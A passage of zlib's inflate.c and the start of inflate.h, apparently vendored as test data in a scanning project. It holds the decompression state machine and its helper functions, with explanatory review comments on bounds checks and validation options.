                if (copy) {
                    /* len is how much of the extra field has already been
                       consumed.  Bytes are stored only while len is below
                       extra_max, and the amount stored is clipped to
                       extra_max - len, so the caller's extra buffer is not
                       written past extra_max bytes. */
                    if (state->head != Z_NULL &&
                        state->head->extra != Z_NULL &&
                        (len = state->head->extra_len - state->length) <
                            state->head->extra_max) {
                        zmemcpy(state->head->extra + len, next,
                                len + copy > state->head->extra_max ?
                                state->head->extra_max - len : copy);
                    }
                    if ((state->flags & 0x0200) && (state->wrap & 4))
                        state->check = crc32(state->check, next, copy);
                    have -= copy;
                    next += copy;
                    state->length -= copy;
                }
                if (state->length) goto inf_leave;
            }
            state->length = 0;
            state->mode = NAME;
                /* fallthrough */
        case NAME:
            if (state->flags & 0x0800) {
                if (have == 0) goto inf_leave;
                copy = 0;
                /* every input byte up to and including the terminating zero
                   is consumed, but a byte is stored only while fewer than
                   name_max bytes have been stored; a name of name_max bytes
                   or more is therefore truncated and left without its
                   terminating zero */
                do {
                    len = (unsigned)(next[copy++]);
                    if (state->head != Z_NULL &&
                            state->head->name != Z_NULL &&
                            state->length < state->head->name_max)
                        state->head->name[state->length++] = (Bytef)len;
                } while (len && copy < have);
                if ((state->flags & 0x0200) && (state->wrap & 4))
                    state->check = crc32(state->check, next, copy);
                have -= copy;
                next += copy;
                if (len) goto inf_leave;
            }
            else if (state->head != Z_NULL)
                state->head->name = Z_NULL;
            state->length = 0;
            state->mode = COMMENT;
                /* fallthrough */
        case COMMENT:
            if (state->flags & 0x1000) {
                if (have == 0) goto inf_leave;
                copy = 0;
                /* same bounded store as NAME, limited by comm_max */
                do {
                    len = (unsigned)(next[copy++]);
                    if (state->head != Z_NULL &&
                            state->head->comment != Z_NULL &&
                            state->length < state->head->comm_max)
                        state->head->comment[state->length++] = (Bytef)len;
                } while (len && copy < have);
                if ((state->flags & 0x0200) && (state->wrap & 4))
                    state->check = crc32(state->check, next, copy);
                have -= copy;
                next += copy;
                if (len) goto inf_leave;
            }
            else if (state->head != Z_NULL)
                state->head->comment = Z_NULL;
            state->mode = HCRC;
                /* fallthrough */
        case HCRC:
            if (state->flags & 0x0200) {
                NEEDBITS(16);
                /* compared only when validation is enabled (wrap bit 2) */
                if ((state->wrap & 4) && hold != (state->check & 0xffff)) {
                    strm->msg = (char *)"header crc mismatch";
                    state->mode = BAD;
                    break;
                }
                INITBITS();
            }
            if (state->head != Z_NULL) {
                state->head->hcrc = (int)((state->flags >> 9) & 1);
                state->head->done = 1;
            }
            strm->adler = state->check = crc32(0L, Z_NULL, 0);
            state->mode = TYPE;
            break;
#endif
        case DICTID:
            NEEDBITS(32);
            strm->adler = state->check = ZSWAP32(hold);
            INITBITS();
            state->mode = DICT;
                /* fallthrough */
        case DICT:
            /* the caller has to supply the dictionary through
               inflateSetDictionary() before decoding can continue */
            if (state->havedict == 0) {
                RESTORE();
                return Z_NEED_DICT;
            }
            strm->adler = state->check = adler32(0L, Z_NULL, 0);
            state->mode = TYPE;
                /* fallthrough */
        case TYPE:
            if (flush == Z_BLOCK || flush == Z_TREES) goto inf_leave;
                /* fallthrough */
        case TYPEDO:
            if (state->last) {
                BYTEBITS();
                state->mode = CHECK;
                break;
            }
            NEEDBITS(3);
            state->last = BITS(1);
            DROPBITS(1);
            switch (BITS(2)) {
            case 0:                             /* stored block */
                Tracev((stderr, "inflate: stored block%s\n",
                        state->last ? " (last)" : ""));
                state->mode = STORED;
                break;
            case 1:                             /* fixed block */
                fixedtables(state);
                Tracev((stderr, "inflate: fixed codes block%s\n",
                        state->last ? " (last)" : ""));
                state->mode = LEN_;             /* decode codes */
                if (flush == Z_TREES) {
                    DROPBITS(2);
                    goto inf_leave;
                }
                break;
            case 2:                             /* dynamic block */
                Tracev((stderr, "inflate: dynamic codes block%s\n",
                        state->last ? " (last)" : ""));
                state->mode = TABLE;
                break;
            case 3:
                strm->msg = (char *)"invalid block type";
                state->mode = BAD;
            }
            DROPBITS(2);
            break;
        case STORED:
            BYTEBITS();                         /* go to byte boundary */
            NEEDBITS(32);
            /* the low 16 bits must be the one's complement of the high 16
               bits, otherwise the block is rejected */
            if ((hold & 0xffff) != ((hold >> 16) ^ 0xffff)) {
                strm->msg = (char *)"invalid stored block lengths";
                state->mode = BAD;
                break;
            }
            state->length = (unsigned)hold & 0xffff;
            Tracev((stderr, "inflate: stored length %u\n",
                    state->length));
            INITBITS();
            state->mode = COPY_;
            if (flush == Z_TREES) goto inf_leave;
                /* fallthrough */
        case COPY_:
            state->mode = COPY;
                /* fallthrough */
        case COPY:
            copy = state->length;
            if (copy) {
                /* never copy more than the input available or the output
                   space left */
                if (copy > have) copy = have;
                if (copy > left) copy = left;
                if (copy == 0) goto inf_leave;
                zmemcpy(put, next, copy);
                have -= copy;
                next += copy;
                left -= copy;
                put += copy;
                state->length -= copy;
                break;
            }
            Tracev((stderr, "inflate: stored end\n"));
            state->mode = TYPE;
            break;
        case TABLE:
            NEEDBITS(14);
            state->nlen = BITS(5) + 257;
            DROPBITS(5);
            state->ndist = BITS(5) + 1;
            DROPBITS(5);
            state->ncode = BITS(4) + 4;
            DROPBITS(4);
            /* this bound on the symbol counts is compiled out when
               PKZIP_BUG_WORKAROUND is defined */
#ifndef PKZIP_BUG_WORKAROUND
            if (state->nlen > 286 || state->ndist > 30) {
                strm->msg = (char *)"too many length or distance symbols";
                state->mode = BAD;
                break;
            }
#endif
            Tracev((stderr, "inflate: table sizes ok\n"));
            state->have = 0;
            state->mode = LENLENS;
                /* fallthrough */
        case LENLENS:
            while (state->have < state->ncode) {
                NEEDBITS(3);
                state->lens[order[state->have++]] = (unsigned short)BITS(3);
                DROPBITS(3);
            }
            while (state->have < 19)
                state->lens[order[state->have++]] = 0;
            state->next = state->codes;
            state->lencode = (const code FAR *)(state->next);
            state->lenbits = 7;
            ret = inflate_table(CODES, state->lens, 19, &(state->next),
                                &(state->lenbits), state->work);
            if (ret) {
                strm->msg = (char *)"invalid code lengths set";
                state->mode = BAD;
                break;
            }
            Tracev((stderr, "inflate: code lengths ok\n"));
            state->have = 0;
            state->mode = CODELENS;
                /* fallthrough */
        case CODELENS:
            while (state->have < state->nlen + state->ndist) {
                for (;;) {
                    here = state->lencode[BITS(state->lenbits)];
                    if ((unsigned)(here.bits) <= bits) break;
                    PULLBYTE();
                }
                if (here.val < 16) {
                    DROPBITS(here.bits);
                    state->lens[state->have++] = here.val;
                }
                else {
                    if (here.val == 16) {
                        NEEDBITS(here.bits + 2);
                        DROPBITS(here.bits);
                        /* a "repeat previous length" code needs a previous
                           length to repeat */
                        if (state->have == 0) {
                            strm->msg = (char *)"invalid bit length repeat";
                            state->mode = BAD;
                            break;
                        }
                        len = state->lens[state->have - 1];
                        copy = 3 + BITS(2);
                        DROPBITS(2);
                    }
                    else if (here.val == 17) {
                        NEEDBITS(here.bits + 3);
                        DROPBITS(here.bits);
                        len = 0;
                        copy = 3 + BITS(3);
                        DROPBITS(3);
                    }
                    else {
                        NEEDBITS(here.bits + 7);
                        DROPBITS(here.bits);
                        len = 0;
                        copy = 11 + BITS(7);
                        DROPBITS(7);
                    }
                    /* a repeat may not run past the nlen + ndist lengths
                       announced for this block; this bounds the writes into
                       state->lens[] below */
                    if (state->have + copy > state->nlen + state->ndist) {
                        strm->msg = (char *)"invalid bit length repeat";
                        state->mode = BAD;
                        break;
                    }
                    while (copy--)
                        state->lens[state->have++] = (unsigned short)len;
                }
            }

            /* handle error breaks in while */
            if (state->mode == BAD) break;

            /* check for end-of-block code (better have one) */
            if (state->lens[256] == 0) {
                strm->msg = (char *)"invalid code -- missing end-of-block";
                state->mode = BAD;
                break;
            }

            /* build code tables -- note: do not change the lenbits or distbits
               values here (9 and 6) without reading the comments in inftrees.h
               concerning the ENOUGH constants, which depend on those values */
            state->next = state->codes;
            state->lencode = (const code FAR *)(state->next);
            state->lenbits = 9;
            ret = inflate_table(LENS, state->lens, state->nlen, &(state->next),
                                &(state->lenbits), state->work);
            if (ret) {
                strm->msg = (char *)"invalid literal/lengths set";
                state->mode = BAD;
                break;
            }
            state->distcode = (const code FAR *)(state->next);
            state->distbits = 6;
            ret = inflate_table(DISTS, state->lens + state->nlen, state->ndist,
                            &(state->next), &(state->distbits), state->work);
            if (ret) {
                strm->msg = (char *)"invalid distances set";
                state->mode = BAD;
                break;
            }
            Tracev((stderr, "inflate: codes ok\n"));
            state->mode = LEN_;
            if (flush == Z_TREES) goto inf_leave;
                /* fallthrough */
        case LEN_:
            state->mode = LEN;
                /* fallthrough */
        case LEN:
            /* inflate_fast() is used only with at least 6 input bytes and
               258 output bytes available; it is defined outside this
               excerpt */
            if (have >= 6 && left >= 258) {
                RESTORE();
                inflate_fast(strm, out);
                LOAD();
                if (state->mode == TYPE)
                    state->back = -1;
                break;
            }
            state->back = 0;
            for (;;) {
                here = state->lencode[BITS(state->lenbits)];
                if ((unsigned)(here.bits) <= bits) break;
                PULLBYTE();
            }
            if (here.op && (here.op & 0xf0) == 0) {
                last = here;
                for (;;) {
                    here = state->lencode[last.val +
                            (BITS(last.bits + last.op) >> last.bits)];
                    if ((unsigned)(last.bits + here.bits) <= bits) break;
                    PULLBYTE();
                }
                DROPBITS(last.bits);
                state->back += last.bits;
            }
            DROPBITS(here.bits);
            state->back += here.bits;
            state->length = (unsigned)here.val;
            if ((int)(here.op) == 0) {
                Tracevv((stderr, here.val >= 0x20 && here.val < 0x7f ?
                        "inflate: literal '%c'\n" :
                        "inflate: literal 0x%02x\n", here.val));
                state->mode = LIT;
                break;
            }
            if (here.op & 32) {
                Tracevv((stderr, "inflate: end of block\n"));
                state->back = -1;
                state->mode = TYPE;
                break;
            }
            if (here.op & 64) {
                strm->msg = (char *)"invalid literal/length code";
                state->mode = BAD;
                break;
            }
            state->extra = (unsigned)(here.op) & 15;
            state->mode = LENEXT;
                /* fallthrough */
        case LENEXT:
            if (state->extra) {
                NEEDBITS(state->extra);
                state->length += BITS(state->extra);
                DROPBITS(state->extra);
                state->back += state->extra;
            }
            Tracevv((stderr, "inflate: length %u\n", state->length));
            state->was = state->length;
            state->mode = DIST;
                /* fallthrough */
        case DIST:
            for (;;) {
                here = state->distcode[BITS(state->distbits)];
                if ((unsigned)(here.bits) <= bits) break;
                PULLBYTE();
            }
            if ((here.op & 0xf0) == 0) {
                last = here;
                for (;;) {
                    here = state->distcode[last.val +
                            (BITS(last.bits + last.op) >> last.bits)];
                    if ((unsigned)(last.bits + here.bits) <= bits) break;
                    PULLBYTE();
                }
                DROPBITS(last.bits);
                state->back += last.bits;
            }
            DROPBITS(here.bits);
            state->back += here.bits;
            if (here.op & 64) {
                strm->msg = (char *)"invalid distance code";
                state->mode = BAD;
                break;
            }
            state->offset = (unsigned)here.val;
            state->extra = (unsigned)(here.op) & 15;
            state->mode = DISTEXT;
                /* fallthrough */
        case DISTEXT:
            if (state->extra) {
                NEEDBITS(state->extra);
                state->offset += BITS(state->extra);
                DROPBITS(state->extra);
                state->back += state->extra;
            }
            /* the comparison against the zlib-header window size (dmax) is
               compiled in only with INFLATE_STRICT */
#ifdef INFLATE_STRICT
            if (state->offset > state->dmax) {
                strm->msg = (char *)"invalid distance too far back";
                state->mode = BAD;
                break;
            }
#endif
            Tracevv((stderr, "inflate: distance %u\n", state->offset));
            state->mode = MATCH;
                /* fallthrough */
        case MATCH:
            if (left == 0) goto inf_leave;
            copy = out - left;      /* bytes written so far in this call */
            if (state->offset > copy) {         /* copy from window */
                copy = state->offset - copy;
                if (copy > state->whave) {
                    /* the distance reaches before the valid window bytes:
                       rejected whenever state->sane is set */
                    if (state->sane) {
                        strm->msg = (char *)"invalid distance too far back";
                        state->mode = BAD;
                        break;
                    }
                    /* only in builds with this macro, and with sane cleared,
                       the missing history is emitted as zero bytes */
#ifdef INFLATE_ALLOW_INVALID_DISTANCE_TOOFAR_ARRR
                    Trace((stderr, "inflate.c too far\n"));
                    copy -= state->whave;
                    if (copy > state->length) copy = state->length;
                    if (copy > left) copy = left;
                    left -= copy;
                    state->length -= copy;
                    do {
                        *put++ = 0;
                    } while (--copy);
                    if (state->length == 0) state->mode = LEN;
                    break;
#endif
                }
                if (copy > state->wnext) {
                    copy -= state->wnext;
                    from = state->window + (state->wsize - copy);
                }
                else
                    from = state->window + (state->wnext - copy);
                if (copy > state->length) copy = state->length;
            }
            else {                              /* copy from output */
                /* offset <= bytes already written in this call, so the
                   source lies inside the output produced so far */
                from = put - state->offset;
                copy = state->length;
            }
            if (copy > left) copy = left;       /* clip to output space */
            left -= copy;
            state->length -= copy;
            do {
                *put++ = *from++;
            } while (--copy);
            if (state->length == 0) state->mode = LEN;
            break;
        case LIT:
            if (left == 0) goto inf_leave;
            *put++ = (unsigned char)(state->length);
            left--;
            state->mode = LEN;
            break;
        case CHECK:
            if (state->wrap) {
                NEEDBITS(32);
                out -= left;
                strm->total_out += out;
                state->total += out;
                if ((state->wrap & 4) && out)
                    strm->adler = state->check =
                        UPDATE_CHECK(state->check, put - out, out);
                out = left;
                /* the trailer check value is compared only when wrap bit 2
                   is set; with that bit cleared a mismatching trailer is
                   accepted */
                if ((state->wrap & 4) && (
#ifdef GUNZIP
                     state->flags ? hold :
#endif
                     ZSWAP32(hold)) != state->check) {
                    strm->msg = (char *)"incorrect data check";
                    state->mode = BAD;
                    break;
                }
                INITBITS();
                Tracev((stderr, "inflate: check matches trailer\n"));
            }
#ifdef GUNZIP
            state->mode = LENGTH;
                /* fallthrough */
        case LENGTH:
            if (state->wrap && state->flags) {
                NEEDBITS(32);
                /* the gzip length trailer is compared modulo 2^32, again
                   only when wrap bit 2 is set */
                if ((state->wrap & 4) && hold != (state->total & 0xffffffff)) {
                    strm->msg = (char *)"incorrect length check";
                    state->mode = BAD;
                    break;
                }
                INITBITS();
                Tracev((stderr, "inflate: length matches trailer\n"));
            }
#endif
            state->mode = DONE;
                /* fallthrough */
        case DONE:
            ret = Z_STREAM_END;
            goto inf_leave;
        case BAD:
            ret = Z_DATA_ERROR;
            goto inf_leave;
        case MEM:
            return Z_MEM_ERROR;
        case SYNC:
                /* fallthrough */
        default:
            return Z_STREAM_ERROR;
        }

    /*
       Return from inflate(), updating the total counts and the check value.
       If there was no progress during the inflate() call, return a buffer
       error. Call updatewindow() to create and/or update the window state.
       Note: a memory error from inflate() is non-recoverable.
     */
  inf_leave:
    RESTORE();
    if (state->wsize || (out != strm->avail_out && state->mode < BAD &&
            (state->mode < CHECK || flush != Z_FINISH)))
        if (updatewindow(strm, strm->next_out, out - strm->avail_out)) {
            state->mode = MEM;
            return Z_MEM_ERROR;
        }
    in -= strm->avail_in;
    out -= strm->avail_out;
    strm->total_in += in;
    strm->total_out += out;
    state->total += out;
    if ((state->wrap & 4) && out)
        strm->adler = state->check =
            UPDATE_CHECK(state->check, strm->next_out - out, out);
    strm->data_type = (int)state->bits + (state->last ? 64 : 0) +
                      (state->mode == TYPE ? 128 : 0) +
                      (state->mode == LEN_ || state->mode == COPY_ ? 256 : 0);
    if (((in == 0 && out == 0) || flush == Z_FINISH) && ret == Z_OK)
        ret = Z_BUF_ERROR;
    return ret;
}

/* Release the sliding window (if one was allocated) and the inflate state,
   then clear strm->state.  Returns Z_STREAM_ERROR when inflateStateCheck()
   rejects the stream, otherwise Z_OK. */
int ZEXPORT inflateEnd(z_streamp strm) {
    struct inflate_state FAR *state;
    if (inflateStateCheck(strm))
        return Z_STREAM_ERROR;
    state = (struct inflate_state FAR *)strm->state;
    if (state->window != Z_NULL) ZFREE(strm, state->window);
    ZFREE(strm, strm->state);
    strm->state = Z_NULL;       /* no dangling pointer to the freed state */
    Tracev((stderr, "inflate: end\n"));
    return Z_OK;
}

/* Copy the current window contents, oldest bytes first, into dictionary and
   report their count through dictLength.  Either pointer may be Z_NULL to
   skip that output.  No capacity for dictionary is passed in: state->whave
   bytes are written, so the caller's buffer has to be at least that large.
   NOTE(review): the upper bound on whave is presumably the window size --
   confirm against zlib.h. */
int ZEXPORT inflateGetDictionary(z_streamp strm, Bytef *dictionary,
                                 uInt *dictLength) {
    struct inflate_state FAR *state;

    /* check state */
    if (inflateStateCheck(strm)) return Z_STREAM_ERROR;
    state = (struct inflate_state FAR *)strm->state;

    /* copy dictionary */
    if (state->whave && dictionary != Z_NULL) {
        zmemcpy(dictionary, state->window + state->wnext,
                state->whave - state->wnext);
        zmemcpy(dictionary + state->whave - state->wnext,
                state->window, state->wnext);
    }
    if (dictLength != Z_NULL)
        *dictLength = state->whave;
    return Z_OK;
}

/* Install a preset dictionary.  For a wrapped stream the call is accepted
   only in DICT mode, and the Adler-32 of the supplied bytes has to equal the
   identifier stored in state->check, otherwise Z_DATA_ERROR is returned.
   When state->wrap is 0 no identifier is compared.  A failure of
   updatewindow() moves the state to MEM and returns Z_MEM_ERROR. */
int ZEXPORT inflateSetDictionary(z_streamp strm, const Bytef *dictionary,
                                 uInt dictLength) {
    struct inflate_state FAR *state;
    unsigned long dictid;
    int ret;

    /* check state */
    if (inflateStateCheck(strm)) return Z_STREAM_ERROR;
    state = (struct inflate_state FAR *)strm->state;
    if (state->wrap != 0 && state->mode != DICT)
        return Z_STREAM_ERROR;

    /* check for correct dictionary identifier */
    if (state->mode == DICT) {
        dictid = adler32(0L, Z_NULL, 0);
        dictid = adler32(dictid, dictionary, dictLength);
        if (dictid != state->check)
            return Z_DATA_ERROR;
    }

    /* copy dictionary to window using updatewindow(), which will amend the
       existing dictionary if appropriate */
    ret = updatewindow(strm, dictionary + dictLength, dictLength);
    if (ret) {
        state->mode = MEM;
        return Z_MEM_ERROR;
    }
    state->havedict = 1;
    Tracev((stderr, "inflate: dictionary set\n"));
    return Z_OK;
}

/* Register head as the place where inflate() stores gzip header fields.
   Returns Z_STREAM_ERROR unless gzip decoding is enabled (wrap bit 1).
   NOTE(review): head is dereferenced without a Z_NULL check, so callers
   have to pass a valid structure. */
int ZEXPORT inflateGetHeader(z_streamp strm, gz_headerp head) {
    struct inflate_state FAR *state;

    /* check state */
    if (inflateStateCheck(strm)) return Z_STREAM_ERROR;
    state = (struct inflate_state FAR *)strm->state;
    if ((state->wrap & 2) == 0) return Z_STREAM_ERROR;

    /* save header structure */
    state->head = head;
    head->done = 0;
    return Z_OK;
}

/*
   Search buf[0..len-1] for the pattern: 0, 0, 0xff, 0xff. Return when found
   or when out of input. When called, *have is the number of pattern bytes
   found in order so far, in 0..3. On return *have is updated to the new
   state. If on return *have equals four, then the pattern was found and the
   return value is how many bytes were read including the last byte of the
   pattern. If *have is less than four, then the pattern has not been found
   yet and the return value is len. In the latter case, syncsearch() can be
   called again with more data and the *have state. *have is initialized to
   zero for the first call.
 */
local unsigned syncsearch(unsigned FAR *have, const unsigned char FAR *buf,
                          unsigned len) {
    unsigned got;
    unsigned next;

    got = *have;
    next = 0;
    while (next < len && got < 4) {
        if ((int)(buf[next]) == (got < 2 ? 0 : 0xff))
            got++;
        else if (buf[next])
            got = 0;            /* nonzero mismatch: start over */
        else
            got = 4 - got;      /* a zero byte restarts the run of zeros */
        next++;
    }
    *have = got;
    return next;
}

/* Skip input until the 0, 0, 0xff, 0xff pattern is found, then reset the
   stream so inflate() resumes at a block boundary (mode TYPE).  Returns
   Z_BUF_ERROR with no input and fewer than 8 buffered bits, Z_DATA_ERROR
   while the pattern has not been found, and Z_OK once it has.  On success
   the check-value bit of wrap is cleared (or wrap is set to 0 if no header
   was seen), so data decoded afterwards is not verified against a trailer
   check value. */
int ZEXPORT inflateSync(z_streamp strm) {
    unsigned len;               /* number of bytes to look at or looked at */
    int flags;                  /* temporary to save header status */
    unsigned long in, out;      /* temporary to save total_in and total_out */
    unsigned char buf[4];       /* to restore bit buffer to byte string */
    struct inflate_state FAR *state;

    /* check parameters */
    if (inflateStateCheck(strm)) return Z_STREAM_ERROR;
    state = (struct inflate_state FAR *)strm->state;
    if (strm->avail_in == 0 && state->bits < 8) return Z_BUF_ERROR;

    /* if first time, start search in bit buffer */
    if (state->mode != SYNC) {
        state->mode = SYNC;
        state->hold <<= state->bits & 7;
        state->bits -= state->bits & 7;
        len = 0;
        while (state->bits >= 8) {
            buf[len++] = (unsigned char)(state->hold);
            state->hold >>= 8;
            state->bits -= 8;
        }
        state->have = 0;
        syncsearch(&(state->have), buf, len);
    }

    /* search available input */
    len = syncsearch(&(state->have), strm->next_in, strm->avail_in);
    strm->avail_in -= len;
    strm->next_in += len;
    strm->total_in += len;

    /* return no joy or set up to restart inflate() on a new block */
    if (state->have != 4) return Z_DATA_ERROR;
    if (state->flags == -1)
        state->wrap = 0;    /* if no header yet, treat as raw */
    else
        state->wrap &= ~4;  /* no point in computing a check value now */
    flags = state->flags;
    in = strm->total_in;
    out = strm->total_out;
    inflateReset(strm);
    strm->total_in = in;
    strm->total_out = out;
    state->flags = flags;
    state->mode = TYPE;
    return Z_OK;
}

/*
   Returns true if inflate is currently at the end of a block generated by
   Z_SYNC_FLUSH or Z_FULL_FLUSH. This function is used by one PPP
   implementation to provide an additional safety check. PPP uses
   Z_SYNC_FLUSH but removes the length bytes of the resulting empty stored
   block. When decompressing, PPP checks that at the end of input packet,
   inflate is waiting for these length bytes.
*/
int ZEXPORT inflateSyncPoint(z_streamp strm) {
    struct inflate_state FAR *st;

    if (inflateStateCheck(strm))
        return Z_STREAM_ERROR;
    st = (struct inflate_state FAR *)strm->state;

    /* a sync point means: waiting in STORED with an empty bit buffer */
    if (st->mode != STORED)
        return 0;
    return st->bits == 0;
}

/* Duplicate the inflate state of source into dest, including a private copy
   of the sliding window when one exists.  Returns Z_STREAM_ERROR for a bad
   source state or a Z_NULL dest, Z_MEM_ERROR when an allocation fails (the
   partially allocated state is released first), otherwise Z_OK. */
int ZEXPORT inflateCopy(z_streamp dest, z_streamp source) {
    struct inflate_state FAR *src;
    struct inflate_state FAR *clone;
    unsigned char FAR *win = Z_NULL;

    /* check input */
    if (inflateStateCheck(source) || dest == Z_NULL)
        return Z_STREAM_ERROR;
    src = (struct inflate_state FAR *)source->state;

    /* allocate space */
    clone = (struct inflate_state FAR *)
            ZALLOC(source, 1, sizeof(struct inflate_state));
    if (clone == Z_NULL)
        return Z_MEM_ERROR;
    if (src->window != Z_NULL) {
        win = (unsigned char FAR *)
              ZALLOC(source, 1U << src->wbits, sizeof(unsigned char));
        if (win == Z_NULL) {
            ZFREE(source, clone);
            return Z_MEM_ERROR;
        }
    }

    /* copy state */
    zmemcpy((voidpf)dest, (voidpf)source, sizeof(z_stream));
    zmemcpy((voidpf)clone, (voidpf)src, sizeof(struct inflate_state));
    clone->strm = dest;

    /* table pointers that point into src->codes[] are rebased onto the
       clone's own codes[]; pointers outside that array stay as copied */
    if (src->lencode >= src->codes &&
        src->lencode <= src->codes + ENOUGH - 1) {
        clone->lencode = clone->codes + (src->lencode - src->codes);
        clone->distcode = clone->codes + (src->distcode - src->codes);
    }
    clone->next = clone->codes + (src->next - src->codes);

    if (win != Z_NULL)
        zmemcpy(win, src->window, 1U << src->wbits);
    clone->window = win;
    dest->state = (struct internal_state FAR *)clone;
    return Z_OK;
}

/* Request that inflate() tolerate distances that reach before the window.
   Only builds defining INFLATE_ALLOW_INVALID_DISTANCE_TOOFAR_ARRR honour the
   request; every other build forces sane back to 1 and answers
   Z_DATA_ERROR. */
int ZEXPORT inflateUndermine(z_streamp strm, int subvert) {
    struct inflate_state FAR *st;

    if (inflateStateCheck(strm))
        return Z_STREAM_ERROR;
    st = (struct inflate_state FAR *)strm->state;
#ifdef INFLATE_ALLOW_INVALID_DISTANCE_TOOFAR_ARRR
    st->sane = subvert ? 0 : 1;
    return Z_OK;
#else
    (void)subvert;
    st->sane = 1;
    return Z_DATA_ERROR;
#endif
}

/* Switch check-value validation (bit 2 of wrap) on or off.  The bit is set
   only when check is nonzero and the stream has a wrapper; in every other
   case it is cleared, and inflate() then no longer compares the trailer
   check value. */
int ZEXPORT inflateValidate(z_streamp strm, int check) {
    struct inflate_state FAR *st;

    if (inflateStateCheck(strm))
        return Z_STREAM_ERROR;
    st = (struct inflate_state FAR *)strm->state;
    if (!check || st->wrap == 0) {
        st->wrap &= ~4;
        return Z_OK;
    }
    st->wrap |= 4;
    return Z_OK;
}

/* Report state->back in the bits above bit 15, plus the remaining stored
   length (COPY) or the part of the match already copied (MATCH).  Returns
   -(1L << 16) when the stream state is invalid. */
long ZEXPORT inflateMark(z_streamp strm) {
    struct inflate_state FAR *st;
    unsigned progress;

    if (inflateStateCheck(strm))
        return -(1L << 16);
    st = (struct inflate_state FAR *)strm->state;
    if (st->mode == COPY)
        progress = st->length;
    else if (st->mode == MATCH)
        progress = st->was - st->length;
    else
        progress = 0;
    return (long)(((unsigned long)((long)st->back)) << 16) + progress;
}

/* Number of entries of codes[] consumed by the current decoding tables, or
   (unsigned long)-1 when the stream state is invalid. */
unsigned long ZEXPORT inflateCodesUsed(z_streamp strm) {
    struct inflate_state FAR *st;

    if (inflateStateCheck(strm))
        return (unsigned long)-1;
    st = (struct inflate_state FAR *)strm->state;
    return (unsigned long)(st->next - st->codes);
}

================================================
FILE: internal/scalibrextract/filesystem/vendored/testdata/thirdparty/zlib/inflate.h
================================================
/* inflate.h -- internal inflate state definition
 * Copyright (C) 1995-2019 Mark Adler
 * For conditions of distribution and use, see copyright notice in zlib.h
 */

/* WARNING: this file should *not* be used by applications. It is
   part of the implementation of the compression library and is
   subject to change. Applications should only use zlib.h.
 */

/* define NO_GZIP when compiling if you want to disable gzip header and
   trailer decoding by inflate(). NO_GZIP would be used to avoid linking in
   the crc code when it is not needed. For shared libraries, gzip decoding
   should be left enabled.
*/
#ifndef NO_GZIP
#  define GUNZIP
#endif

/* Possible inflate modes between inflate() calls */
/* The enumerators are ordered: inflate() compares modes numerically
   (state->mode < BAD, state->mode < CHECK), so the order below is part of
   the contract. */
typedef enum {
    HEAD = 16180,   /* i: waiting for magic header */
    FLAGS,      /* i: waiting for method and flags (gzip) */
    TIME,       /* i: waiting for modification time (gzip) */
    OS,         /* i: waiting for extra flags and operating system (gzip) */
    EXLEN,      /* i: waiting for extra length (gzip) */
    EXTRA,      /* i: waiting for extra bytes (gzip) */
    NAME,       /* i: waiting for end of file name (gzip) */
    COMMENT,    /* i: waiting for end of comment (gzip) */
    HCRC,       /* i: waiting for header crc (gzip) */
    DICTID,     /* i: waiting for dictionary check value */
    DICT,       /* waiting for inflateSetDictionary() call */
        TYPE,       /* i: waiting for type bits, including last-flag bit */
        TYPEDO,     /* i: same, but skip check to exit inflate on new block */
        STORED,     /* i: waiting for stored size (length and complement) */
        COPY_,      /* i/o: same as COPY below, but only first time in */
        COPY,       /* i/o: waiting for input or output to copy stored block */
        TABLE,      /* i: waiting for dynamic block table lengths */
        LENLENS,    /* i: waiting for code length code lengths */
        CODELENS,   /* i: waiting for length/lit and distance code lengths */
            LEN_,       /* i: same as LEN below, but only first time in */
            LEN,        /* i: waiting for length/lit/eob code */
            LENEXT,     /* i: waiting for length extra bits */
            DIST,       /* i: waiting for distance code */
            DISTEXT,    /* i: waiting for distance extra bits */
            MATCH,      /* o: waiting for output space to copy string */
            LIT,        /* o: waiting for output space to write literal */
    CHECK,      /* i: waiting for 32-bit check value */
    LENGTH,     /* i: waiting for 32-bit length (gzip) */
    DONE,       /* finished check, done -- remain here until reset */
    BAD,        /* got a data error -- remain here until reset */
    MEM,        /* got an inflate() memory error -- remain here until reset */
    SYNC        /* looking for synchronization bytes to restart inflate() */
} inflate_mode;

/*
    State transitions between above modes -

    (most modes can go to BAD or MEM on error -- not shown for clarity)

    Process header:
        HEAD -> (gzip) or (zlib) or (raw)
        (gzip) -> FLAGS -> TIME -> OS -> EXLEN -> EXTRA -> NAME -> COMMENT ->
                  HCRC -> TYPE
        (zlib) -> DICTID or TYPE
        DICTID -> DICT -> TYPE
        (raw) -> TYPEDO
    Read deflate blocks:
            TYPE -> TYPEDO -> STORED or TABLE or LEN_ or CHECK
            STORED -> COPY_ -> COPY -> TYPE
            TABLE -> LENLENS -> CODELENS -> LEN_
            LEN_ -> LEN
    Read deflate codes in fixed or dynamic block:
                LEN -> LENEXT or LIT or TYPE
                LENEXT -> DIST -> DISTEXT -> MATCH -> LEN
                LIT -> LEN
    Process trailer:
        CHECK -> LENGTH -> DONE
 */

/* State maintained between inflate() calls -- approximately 7K bytes, not
   including the allocated sliding window, which is up to 32K bytes. */
struct inflate_state {
    z_streamp strm;             /* pointer back to this zlib stream */
    inflate_mode mode;          /* current inflate mode */
    int last;                   /* true if processing last block */
    int wrap;                   /* bit 0 true for zlib, bit 1 true for gzip,
                                   bit 2 true to validate check value */
        /* review note: inflateValidate() and inflateSync() in inflate.c
           clear bit 2; once cleared, inflate() skips the header-crc, data
           check and length comparisons */
    int havedict;               /* true if dictionary provided */
    int flags;                  /* gzip header method and flags, 0 if zlib, or
                                   -1 if raw or no header yet */
    unsigned dmax;              /* zlib header max distance (INFLATE_STRICT) */
    unsigned long check;        /* protected copy of check value */
    unsigned long total;        /* protected copy of output count */
    gz_headerp head;            /* where to save gzip header information */
        /* sliding window */
    unsigned wbits;             /* log base 2 of requested window size */
    unsigned wsize;             /* window size or zero if not using window */
    unsigned whave;             /* valid bytes in the window */
    unsigned wnext;             /* window write index */
    unsigned char FAR *window;  /* allocated sliding window, if needed */
        /* bit accumulator */
    unsigned long hold;         /* input bit accumulator */
    unsigned bits;              /* number of bits in "in" */
        /* for string and stored block copying */
    unsigned length;            /* literal or length of data to copy */
    unsigned offset;            /* distance back to copy string from */
        /* for table and code decoding */
    unsigned extra;             /* extra bits needed */
        /* fixed and dynamic code tables */
    code const FAR *lencode;    /* starting table for length/literal codes */
    code const FAR *distcode;   /* starting table for distance codes */
    unsigned lenbits;           /* index bits for lencode */
    unsigned distbits;          /* index bits for distcode */
        /* dynamic table building */
